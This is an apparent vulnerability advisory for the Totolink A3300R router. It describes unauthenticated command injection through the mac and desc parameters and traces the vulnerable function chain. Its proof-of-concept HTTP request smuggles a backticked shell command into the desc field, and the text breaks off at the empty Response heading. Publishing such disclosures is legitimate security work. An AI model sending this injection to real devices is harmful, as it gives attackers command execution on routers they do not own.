Overview

• Vendor: TOTOLINK
• Product: Totolink A3300R
• Version: V17.0.0cu.596_B20250515
• Manufacturer's address：https://www.totolink.net/
• Firmware download address : https://www.totolink.net/data/upload/20250515/8c0a04842e9e10188d0822b7b19cf212.web

Vulnerability details

Totolink A3300R_Latest V17.0.0cu.596_B20250515 was found to contain a command injection vulnerability in the sub_4197C0 function via the mac, desc parameters. This vulnerability allows unauthenticated attackers to execute arbitrary commands via a crafted request.

Analyse

• In the binary file shttp, the function sub_4197C0 retrieves the mac and desc parameters, uses the snprintf function to format a string by concatenating the two parameters, and then passes the resulting string to the function wificonf_add_by_key

• In the binary file libcscommon.so , the function wificonf_add_by_key passes the value of a3 to v12, then calls the function csteSystem()

Request

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.1.4:1380
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 127
Origin: <http://192.168.1.4:1380>
Connection: keep-alive
Referer: <http://192.168.1.4:1380/login.html>
X-PwnFox-Color: blue
Priority: u=0

{"mac":"14:16:9E:CC:BB:3F","desc":"hihihohohaha`ls>/web/cmdi2.txt`","addEffect":"1","wifiIdx":"0","topicurl":"setWiFiAclRules"}

Response